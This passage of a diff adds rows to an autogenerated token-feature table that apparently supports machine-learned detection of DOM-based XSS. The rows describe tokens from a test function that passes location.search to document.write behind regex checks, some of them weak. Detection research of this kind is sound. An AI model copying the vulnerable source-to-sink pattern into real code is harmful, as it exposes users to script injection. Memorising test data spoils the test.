autogenerated/Xss/DomBasedXss/tst.js:112:7:112:13 | /^\\d+$/ | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:13 | /^\\d+$/ | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:13 | /^\\d+$/ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:18 | /^\\d+$/.test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:18 | /^\\d+$/.test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:18 | /^\\d+$/.test | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:18 | /^\\d+$/.test | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:18 | /^\\d+$/.test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | /^\\d+$/.test(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | /^\\d+$/.test(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | /^\\d+$/.test(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | /^\\d+$/.test(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | /^\\d+$/.test(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | exceptional return of /^\\d+$/.test(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | exceptional return of /^\\d+$/.test(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | exceptional return of /^\\d+$/.test(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | exceptional return of /^\\d+$/.test(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:21 | exceptional return of /^\\d+$/.test(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:112:15:112:18 | test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:112:15:112:18 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:112:15:112:18 | test | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:112:15:112:18 | test | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:112:15:112:18 | test | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:112:20:112:20 | v | CalleeFlexibleAccessPath | ?.test | | autogenerated/Xss/DomBasedXss/tst.js:112:20:112:20 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:112:20:112:20 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16453,6 +114496,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:112:20:112:20 | v | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | | autogenerated/Xss/DomBasedXss/tst.js:112:20:112:20 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:112:20:112:20 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:12 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:12 | document | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:12 | document | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:12 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:18 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:18 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:18 | document.write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:18 | document.write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:18 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | document.write(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | exceptional return of document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | exceptional return of document.write(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | exceptional return of document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | exceptional return of document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:114:5:114:21 | exceptional return of document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:114:14:114:18 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:114:14:114:18 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:114:14:114:18 | write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:114:14:114:18 | write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:114:14:114:18 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:114:20:114:20 | v | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:114:20:114:20 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:114:20:114:20 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16461,6 +114529,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:114:20:114:20 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:114:20:114:20 | v | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:114:20:114:20 | v | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:117:7:117:27 | (m = /^ ... xec(v)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:117:7:117:27 | (m = /^ ... xec(v)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:117:7:117:27 | (m = /^ ... xec(v)) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:117:7:117:27 | (m = /^ ... xec(v)) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:117:7:117:27 | (m = /^ ... xec(v)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:8 | m | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:8 | m | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:8 | m | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:8 | m | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:8 | m | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:26 | m = /^\\d+$/.exec(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:26 | m = /^\\d+$/.exec(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:26 | m = /^\\d+$/.exec(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:26 | m = /^\\d+$/.exec(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:117:8:117:26 | m = /^\\d+$/.exec(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:18 | /^\\d+$/ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:18 | /^\\d+$/ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:18 | /^\\d+$/ | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:18 | /^\\d+$/ | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:18 | /^\\d+$/ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:23 | /^\\d+$/.exec | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:23 | /^\\d+$/.exec | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:23 | /^\\d+$/.exec | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:23 | /^\\d+$/.exec | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:23 | /^\\d+$/.exec | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | /^\\d+$/.exec(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | /^\\d+$/.exec(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | /^\\d+$/.exec(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | /^\\d+$/.exec(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | /^\\d+$/.exec(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | exceptional return of /^\\d+$/.exec(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | exceptional return of /^\\d+$/.exec(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | exceptional return of /^\\d+$/.exec(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | exceptional return of /^\\d+$/.exec(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:117:12:117:26 | exceptional return of /^\\d+$/.exec(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:117:20:117:23 | exec | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:117:20:117:23 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:117:20:117:23 | exec | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:117:20:117:23 | exec | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:117:20:117:23 | exec | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:117:25:117:25 | v | CalleeFlexibleAccessPath | ?.exec | | autogenerated/Xss/DomBasedXss/tst.js:117:25:117:25 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:117:25:117:25 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16468,6 +114576,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:117:25:117:25 | v | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | | autogenerated/Xss/DomBasedXss/tst.js:117:25:117:25 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:117:25:117:25 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:12 | document | contextFunctionInterfaces | 